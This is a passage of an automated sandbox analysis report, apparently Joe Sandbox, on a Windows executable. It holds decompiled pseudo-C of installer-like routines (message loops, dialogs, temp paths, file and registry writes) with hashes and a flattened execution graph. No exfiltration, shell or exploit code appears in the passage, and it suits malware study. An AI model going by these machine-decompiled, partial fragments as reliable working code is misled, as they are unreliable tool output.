                                                                                                                                                                                                                                            				_t16 = 0;
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                                                                                                                                                                                                                                            					if(_t8 == 0) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						do {
                                                                                                                                                                                                                                            							if(_v36.message != 0x12) {
                                                                                                                                                                                                                                            								DispatchMessageA( &_v36);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t16 = 1;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                                                                                                                                                                                                                                            						} while (_t8 != 0);
                                                                                                                                                                                                                                            						if(_t16 == 0) {
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					break;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t8;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A0369F
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A036B2
                                                                                                                                                                                                                                            • DispatchMessageA.USER32(?), ref: 00A036CB
                                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A036DA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2776232527-0
                                                                                                                                                                                                                                            • Opcode ID: 7e36db9670bd1bed826a062eb9e624116a1793ab8c7f7cd8d5c2e23126a38f98
                                                                                                                                                                                                                                            • Instruction ID: 7688ea1ae80da15b37b26b1ebabfbb47dac45813bb5b7e9c623bfaa8f18360a3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e36db9670bd1bed826a062eb9e624116a1793ab8c7f7cd8d5c2e23126a38f98
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9701677390025D77DF308BE66C48EEB767CEBC6B10F140219F915E21C0D565C655C6A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                                            			E00A06517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                                                                                                                                                                                                                                            				struct HRSRC__* _t6;
                                                                                                                                                                                                                                            				void* _t21;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                                            				int _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t23 =  *0xa09a3c; // 0xa00000
                                                                                                                                                                                                                                            				_t6 = FindResourceA(_t23, __edx, 5);
                                                                                                                                                                                                                                            				if(_t6 == 0) {
                                                                                                                                                                                                                                            					L6:
                                                                                                                                                                                                                                            					E00A044B9(0, 0x4fb, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					_t24 = _a16;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t21 = LoadResource(_t23, _t6);
                                                                                                                                                                                                                                            					if(_t21 == 0) {
                                                                                                                                                                                                                                            						goto L6;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_a12 != 0) {
                                                                                                                                                                                                                                            							_push(_a12);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                                                                                                                                                                                                                                            						FreeResource(_t21);
                                                                                                                                                                                                                                            						if(_t24 == 0xffffffff) {
                                                                                                                                                                                                                                            							goto L6;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t24;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • FindResourceA.KERNEL32(00A00000,000007D6,00000005), ref: 00A0652A
                                                                                                                                                                                                                                            • LoadResource.KERNEL32(00A00000,00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A06538
                                                                                                                                                                                                                                            • DialogBoxIndirectParamA.USER32(00A00000,00000000,00000547,00A019E0,00000000), ref: 00A06557
                                                                                                                                                                                                                                            • FreeResource.KERNEL32(00000000,?,?,00A02EE8,00000000,00A019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A06560
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Resource$DialogFindFreeIndirectLoadParam
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1214682469-0
                                                                                                                                                                                                                                            • Opcode ID: 71ff7e8038cc6171b5ceb3085fa76534bf7bbe49fa3392fd7a3ffb10a4f85817
                                                                                                                                                                                                                                            • Instruction ID: 81976681fc25a9ae96387ae433dbf976da7524f4d1ac4ba0e36828704a5462db
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71ff7e8038cc6171b5ceb3085fa76534bf7bbe49fa3392fd7a3ffb10a4f85817
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A201D67210061DBBDB109FA9BC48DBB7A6CEB99765F000125FE15A3190D7719D2286A1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                                            			E00A065E8(char* __ecx) {
                                                                                                                                                                                                                                            				char _t3;
                                                                                                                                                                                                                                            				char _t10;
                                                                                                                                                                                                                                            				char* _t12;
                                                                                                                                                                                                                                            				char* _t14;
                                                                                                                                                                                                                                            				char* _t15;
                                                                                                                                                                                                                                            				CHAR* _t16;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t12 = __ecx;
                                                                                                                                                                                                                                            				_t15 = __ecx;
                                                                                                                                                                                                                                            				_t14 =  &(__ecx[1]);
                                                                                                                                                                                                                                            				_t10 = 0;
                                                                                                                                                                                                                                            				do {
                                                                                                                                                                                                                                            					_t3 =  *_t12;
                                                                                                                                                                                                                                            					_t12 =  &(_t12[1]);
                                                                                                                                                                                                                                            				} while (_t3 != 0);
                                                                                                                                                                                                                                            				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                                                                                                                                                                                                                                            				while(1) {
                                                                                                                                                                                                                                            					_t16 = CharPrevA(_t15, ??);
                                                                                                                                                                                                                                            					if(_t16 <= _t15) {
                                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                                            						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                                                                                                                                                                                                                                            							_t16 = CharNextA(_t16);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *_t16 = _t10;
                                                                                                                                                                                                                                            						_t10 = 1;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_push(_t16);
                                                                                                                                                                                                                                            						continue;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return _t10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if( *_t16 == 0x5c) {
                                                                                                                                                                                                                                            					goto L7;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				goto L11;
                                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A02B33), ref: 00A06602
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A06612
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,00000000), ref: 00A06629
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A06635
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Prev$Next
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3260447230-0
                                                                                                                                                                                                                                            • Opcode ID: 3919147fc9f0ee0fd6b932b287b99feeb91e6b4c74ea149252038810945d0b64
                                                                                                                                                                                                                                            • Instruction ID: b7de169663cbe2be6e2876d10e8a770f30c609194f13735f78a9a3fa6538ddae
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3919147fc9f0ee0fd6b932b287b99feeb91e6b4c74ea149252038810945d0b64
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1BF028320046986EE7369B68AC988BBBF9CCF9B358F2902AFE49182041D6160D178661
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A069B0() {
                                                                                                                                                                                                                                            				intOrPtr* _t4;
                                                                                                                                                                                                                                            				intOrPtr* _t5;
                                                                                                                                                                                                                                            				void* _t6;
                                                                                                                                                                                                                                            				intOrPtr _t11;
                                                                                                                                                                                                                                            				intOrPtr _t12;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				 *0xa081f8 = E00A06C70();
                                                                                                                                                                                                                                            				__set_app_type(E00A06FBE(2));
                                                                                                                                                                                                                                            				 *0xa088a4 =  *0xa088a4 | 0xffffffff;
                                                                                                                                                                                                                                            				 *0xa088a8 =  *0xa088a8 | 0xffffffff;
                                                                                                                                                                                                                                            				_t4 = __p__fmode();
                                                                                                                                                                                                                                            				_t11 =  *0xa08528; // 0x0
                                                                                                                                                                                                                                            				 *_t4 = _t11;
                                                                                                                                                                                                                                            				_t5 = __p__commode();
                                                                                                                                                                                                                                            				_t12 =  *0xa0851c; // 0x0
                                                                                                                                                                                                                                            				 *_t5 = _t12;
                                                                                                                                                                                                                                            				_t6 = E00A07000();
                                                                                                                                                                                                                                            				if( *0xa08000 == 0) {
                                                                                                                                                                                                                                            					__setusermatherr(E00A07000);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				E00A071EF(_t6);
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A06FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A06FC5
                                                                                                                                                                                                                                            • __set_app_type.MSVCRT ref: 00A069C2
                                                                                                                                                                                                                                            • __p__fmode.MSVCRT ref: 00A069D8
                                                                                                                                                                                                                                            • __p__commode.MSVCRT ref: 00A069E6
                                                                                                                                                                                                                                            • __setusermatherr.MSVCRT ref: 00A06A07
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.419124794.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A00000, based on PE: true
• Associated: 00000001.00000002.419111346.0000000000A00000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419141222.0000000000A08000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.419172416.0000000000A0C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_a00000_fxV11fe.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1632413811-0
                                                                                                                                                                                                                                            • Opcode ID: efe0c7a6571f3c4316713ad3e23a42cddde096e7d56679a326fcb465badf385a
                                                                                                                                                                                                                                            • Instruction ID: 6be573366007048a4607bb670e9f72e0ec06662aad056e5e3acc2016e085a5db
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: efe0c7a6571f3c4316713ad3e23a42cddde096e7d56679a326fcb465badf385a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40F0F87050830D8FD714EFB0BE4A6583B61FB18321B104629E4A2862F1CF3E95578A19
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:26.9%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                            Total number of Nodes:969
                                                                                                                                                                                                                                            Total number of Limit Nodes:42
CharPrevA 3012->3015 3014 a9171e _vsnprintf 3013->3014 3016 a9233f RegSetValueExA 3014->3016 3015->3013 3016->3010 3019 a91a9a 3018->3019 3021 a91aba 3019->3021 3023 a91aaf 3019->3023 3037 a9667f 3019->3037 3021->2917 3022 a9667f 2 API calls 3022->3023 3023->3021 3023->3022 3025 a92ad4 GetModuleFileNameA 3024->3025 3028 a92be6 3024->3028 3036 a92b02 3025->3036 3026 a96ce0 4 API calls 3029 a92bf5 3026->3029 3027 a92af1 IsDBCSLeadByte 3027->3036 3028->3026 3029->2936 3030 a92bca CharNextA 3033 a92bd3 CharNextA 3030->3033 3031 a92b11 CharNextA CharUpperA 3032 a92b8d CharUpperA 3031->3032 3031->3036 3032->3036 3033->3036 3035 a92b43 CharPrevA 3035->3036 3036->3027 3036->3028 3036->3030 3036->3031 3036->3033 3036->3035 3042 a965e8 3036->3042 3040 a96689 3037->3040 3038 a966a5 3038->3019 3039 a96648 IsDBCSLeadByte 3039->3040 3040->3038 3040->3039 3041 a96697 CharNextA 3040->3041 3041->3040 3043 a965f4 3042->3043 3043->3043 3044 a965fb CharPrevA 3043->3044 3045 a96611 CharPrevA 3044->3045 3046 a9660b 3045->3046 3047 a9661e 3045->3047 3046->3045 3046->3047 3048 a9663d 3047->3048 3049 a96634 CharNextA 3047->3049 3050 a96627 CharPrevA 3047->3050 3048->3036 3049->3048 3050->3048 3050->3049 3052 a94132 3051->3052 3054 a9412a 3051->3054 3055 a91ea7 3052->3055 3054->2991 3056 a91ed3 3055->3056 3057 a91eba 3055->3057 3056->3054 3058 a9256d 15 API calls 3057->3058 3058->3056 3060 a91ff0 RegOpenKeyExA 3059->3060 3061 a92026 3059->3061 3060->3061 3062 a9200f RegDeleteValueA RegCloseKey 3060->3062 3061->2321 3062->3061 3129 a919e0 3130 a91a03 3129->3130 3131 a91a24 GetDesktopWindow 3129->3131 3133 a91a16 EndDialog 3130->3133 3134 a91a20 3130->3134 3138 a943d0 6 API calls 3131->3138 3133->3134 3136 a96ce0 4 API calls 3134->3136 3137 a91a7e 3136->3137 3139 a94463 SetWindowPos 3138->3139 3141 a96ce0 4 API calls 3139->3141 3142 a91a33 LoadStringA SetDlgItemTextA MessageBeep 3141->3142 3142->3134 3143 a96a20 __getmainargs 3144 a969b0 3145 a969b5 3144->3145 3153 a96fbe GetModuleHandleW 
3145->3153 3147 a969c1 __set_app_type __p__fmode __p__commode 3148 a969f9 3147->3148 3149 a96a0e 3148->3149 3150 a96a02 __setusermatherr 3148->3150 3155 a971ef _controlfp 3149->3155 3150->3149 3152 a96a13 3154 a96fcf 3153->3154 3154->3147 3155->3152 3156 a934f0 3157 a93504 3156->3157 3158 a935b8 3156->3158 3157->3158 3159 a9351b 3157->3159 3160 a935be GetDesktopWindow 3157->3160 3161 a93671 EndDialog 3158->3161 3162 a93526 3158->3162 3164 a9354f 3159->3164 3165 a9351f 3159->3165 3163 a943d0 11 API calls 3160->3163 3161->3162 3166 a935d6 3163->3166 3164->3162 3168 a93559 ResetEvent 3164->3168 3165->3162 3167 a9352d TerminateThread EndDialog 3165->3167 3170 a9361d SetWindowTextA CreateThread 3166->3170 3171 a935e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3166->3171 3167->3162 3169 a944b9 20 API calls 3168->3169 3172 a93581 3169->3172 3170->3162 3173 a93646 3170->3173 3171->3170 3174 a9359b SetEvent 3172->3174 3176 a9358a SetEvent 3172->3176 3175 a944b9 20 API calls 3173->3175 3177 a93680 4 API calls 3174->3177 3175->3158 3176->3162 3177->3158 3178 a96ef0 3179 a96f2d 3178->3179 3181 a96f02 3178->3181 3180 a96f27 ?terminate@ 3180->3179 3181->3179 3181->3180 3182 a97270 _except_handler4_common 3063 a94cc0 GlobalFree 3064 a96f40 SetUnhandledExceptionFilter 3183 a94bc0 3185 a94bd7 3183->3185 3186 a94c05 3183->3186 3184 a94c1b SetFilePointer 3184->3185 3186->3184 3186->3185 3187 a930c0 3188 a930de CallWindowProcA 3187->3188 3189 a930ce 3187->3189 3190 a930da 3188->3190 3189->3188 3189->3190 3191 a963c0 3192 a96407 3191->3192 3193 a9658a CharPrevA 3192->3193 3194 a96415 CreateFileA 3193->3194 3195 a96448 WriteFile 3194->3195 3196 a9643a 3194->3196 3197 a96465 CloseHandle 3195->3197 3199 a96ce0 4 API calls 3196->3199 3197->3196 3200 a9648f 3199->3200 3201 a93100 3202 a93111 3201->3202 3203 a931b0 3201->3203 3205 a93149 GetDesktopWindow 3202->3205 3209 a9311d 3202->3209 3204 a931b9 SendDlgItemMessageA 3203->3204 3207 a93141 3203->3207 3204->3207 3208 a943d0 11 API 
calls 3205->3208 3206 a93138 EndDialog 3206->3207 3210 a9315d 6 API calls 3208->3210 3209->3206 3209->3207 3210->3207 3211 a94200 3212 a9420b SendMessageA 3211->3212 3213 a9421e 3211->3213 3212->3213 3214 a96c03 3215 a96c1e 3214->3215 3216 a96c17 _exit 3214->3216 3217 a96c32 3215->3217 3218 a96c27 _cexit 3215->3218 3216->3215 3218->3217 3065 a94cd0 3066 a94d0b 3065->3066 3067 a94cf4 3065->3067 3068 a94d02 3066->3068 3071 a94dcb 3066->3071 3074 a94d25 3066->3074 3067->3068 3069 a94b60 FindCloseChangeNotification 3067->3069 3070 a96ce0 4 API calls 3068->3070 3069->3068 3073 a94e95 3070->3073 3072 a94dd4 SetDlgItemTextA 3071->3072 3075 a94de3 3071->3075 3072->3075 3074->3068 3088 a94c37 3074->3088 3075->3068 3093 a9476d 3075->3093 3078 a94e38 3078->3068 3080 a94980 25 API calls 3078->3080 3082 a94e56 3080->3082 3081 a94b60 FindCloseChangeNotification 3083 a94d99 SetFileAttributesA 3081->3083 3082->3068 3084 a94e64 3082->3084 3083->3068 3102 a947e0 LocalAlloc 3084->3102 3087 a94e6f 3087->3068 3089 a94c4c DosDateTimeToFileTime 3088->3089 3092 a94c88 3088->3092 3090 a94c5e LocalFileTimeToFileTime 3089->3090 3089->3092 3091 a94c70 SetFileTime 3090->3091 3090->3092 3091->3092 3092->3068 3092->3081 3111 a966ae GetFileAttributesA 3093->3111 3095 a9477b 3095->3078 3096 a947cc SetFileAttributesA 3097 a947db 3096->3097 3097->3078 3099 a96517 24 API calls 3100 a947b1 3099->3100 3100->3096 3100->3097 3101 a947c2 3100->3101 3101->3096 3103 a9480f LocalAlloc 3102->3103 3104 a947f6 3102->3104 3107 a94831 3103->3107 3110 a9480b 3103->3110 3105 a944b9 20 API calls 3104->3105 3105->3110 3108 a944b9 20 API calls 3107->3108 3109 a94846 LocalFree 3108->3109 3109->3110 3110->3087 3112 a94777 3111->3112 3112->3095 3112->3096 3112->3099 3113 a94ad0 3121 a93680 3113->3121 3116 a94ae9 3117 a94aee WriteFile 3118 a94b0f 3117->3118 3119 a94b14 3117->3119 3119->3118 3120 a94b3b SendDlgItemMessageA 3119->3120 3120->3118 3122 a93691 MsgWaitForMultipleObjects 3121->3122 3123 a936a9 PeekMessageA 
3122->3123 3124 a936e8 3122->3124 3123->3122 3125 a936bc 3123->3125 3124->3116 3124->3117 3125->3122 3125->3124 3126 a936c7 DispatchMessageA 3125->3126 3127 a936d1 PeekMessageA 3125->3127 3126->3127 3127->3125 3219 a93210 3220 a9328e EndDialog 3219->3220 3221 a93227 3219->3221 3236 a93239 3220->3236 3222 a933e2 GetDesktopWindow 3221->3222 3223 a93235 3221->3223 3225 a943d0 11 API calls 3222->3225 3227 a932dd GetDlgItemTextA 3223->3227 3228 a9324c 3223->3228 3223->3236 3226 a933f1 SetWindowTextA SendDlgItemMessageA 3225->3226 3229 a9341f GetDlgItem EnableWindow 3226->3229 3226->3236 3237 a932fc 3227->3237 3252 a93366 3227->3252 3230 a93251 3228->3230 3231 a932c5 EndDialog 3228->3231 3229->3236 3232 a9325c LoadStringA 3230->3232 3230->3236 3231->3236 3234 a9327b 3232->3234 3235 a93294 3232->3235 3233 a944b9 20 API calls 3233->3236 3240 a944b9 20 API calls 3234->3240 3257 a94224 LoadLibraryA 3235->3257 3239 a93331 GetFileAttributesA 3237->3239 3237->3252 3243 a9337c 3239->3243 3244 a9333f 3239->3244 3240->3220 3242 a932a5 SetDlgItemTextA 3242->3234 3242->3236 3245 a9658a CharPrevA 3243->3245 3246 a944b9 20 API calls 3244->3246 3247 a9338d 3245->3247 3248 a93351 3246->3248 3249 a958c8 27 API calls 3247->3249 3248->3236 3250 a9335a CreateDirectoryA 3248->3250 3251 a93394 3249->3251 3250->3243 3250->3252 3251->3252 3253 a933a4 3251->3253 3252->3233 3254 a933c7 EndDialog 3253->3254 3255 a9597d 34 API calls 3253->3255 3254->3236 3256 a933c3 3255->3256 3256->3236 3256->3254 3258 a943b2 3257->3258 3259 a94246 GetProcAddress 3257->3259 3263 a944b9 20 API calls 3258->3263 3260 a9425d GetProcAddress 3259->3260 3261 a943a4 FreeLibrary 3259->3261 3260->3261 3262 a94274 GetProcAddress 3260->3262 3261->3258 3262->3261 3264 a9428b 3262->3264 3265 a9329d 3263->3265 3266 a94295 GetTempPathA 3264->3266 3270 a942e1 3264->3270 3265->3236 3265->3242 3267 a942ad 3266->3267 3267->3267 3268 a942b4 CharPrevA 3267->3268 3269 a942d0 CharPrevA 3268->3269 3268->3270 3269->3270 3271 a94390 
FreeLibrary 3270->3271 3271->3265 3272 a94a50 3273 a94a9f ReadFile 3272->3273 3274 a94a66 3272->3274 3275 a94abb 3273->3275 3274->3275 3276 a94a82 memcpy 3274->3276 3276->3275 3277 a93450 3278 a9345e 3277->3278 3279 a934d3 EndDialog 3277->3279 3281 a9349a GetDesktopWindow 3278->3281 3285 a93465 3278->3285 3280 a9346a 3279->3280 3282 a943d0 11 API calls 3281->3282 3283 a934ac SetWindowTextA SetDlgItemTextA SetForegroundWindow 3282->3283 3283->3280 3284 a9348c EndDialog 3284->3280 3285->3280 3285->3284

Callgraph

[Interactive call graph of the sample's functions. Legend: Executed, Not Executed, Opacity -> Relevance, Disassembly available]

Control-flow Graph

[Interactive control-flow graph for the function at 00A93BA2. Legend: Executed, Not Executed]
C-Code - Quality: 82%
E00A93BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
	signed int _t127;
	void* _t128;
	struct HINSTANCE__* _t129;
	void* _t130;
	short _t137;
	char* _t140;
	signed char _t144;
                                                                                                                                                                                                                                            				signed char _t145;
                                                                                                                                                                                                                                            				signed int _t149;
                                                                                                                                                                                                                                            				void* _t150;
                                                                                                                                                                                                                                            				void* _t151;
                                                                                                                                                                                                                                            				signed int _t153;
                                                                                                                                                                                                                                            				void* _t155;
                                                                                                                                                                                                                                            				void* _t156;
                                                                                                                                                                                                                                            				signed int _t157;
                                                                                                                                                                                                                                            				signed int _t162;
                                                                                                                                                                                                                                            				signed int _t164;
                                                                                                                                                                                                                                            				void* _t165;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                            				_t69 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                            				_t153 = 0;
                                                                                                                                                                                                                                            				 *0xa99124 =  *0xa99124 & 0;
                                                                                                                                                                                                                                            				_t149 = 0;
                                                                                                                                                                                                                                            				_v388 = 0;
                                                                                                                                                                                                                                            				_v384 = 0;
                                                                                                                                                                                                                                            				_t165 =  *0xa98a28 - _t153; // 0x0
                                                                                                                                                                                                                                            				if(_t165 != 0) {
                                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                                            					_t127 = 0;
                                                                                                                                                                                                                                            					_v392 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                            						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                            						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                            						_v348 = 0x44;
                                                                                                                                                                                                                                            						if( *0xa98c42 != 0) {
                                                                                                                                                                                                                                            							goto L26;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t146 =  &_v396;
                                                                                                                                                                                                                                            						_t115 = E00A9468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                            						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                            							L25:
                                                                                                                                                                                                                                            							_t146 = 0x4b1;
                                                                                                                                                                                                                                            							E00A944B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            							 *0xa99124 = 0x80070714;
                                                                                                                                                                                                                                            							goto L62;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							if(_v396 != 1) {
                                                                                                                                                                                                                                            								__eflags = _v396 - 2;
                                                                                                                                                                                                                                            								if(_v396 != 2) {
                                                                                                                                                                                                                                            									_t137 = 3;
                                                                                                                                                                                                                                            									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                            									if(_v396 == _t137) {
                                                                                                                                                                                                                                            										_v304 = 1;
                                                                                                                                                                                                                                            										_v300 = _t137;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            									goto L14;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								_push(6);
                                                                                                                                                                                                                                            								_v304 = 1;
                                                                                                                                                                                                                                            								_pop(0);
                                                                                                                                                                                                                                            								goto L11;
                                                                                                                                                                                                                                            							} else {
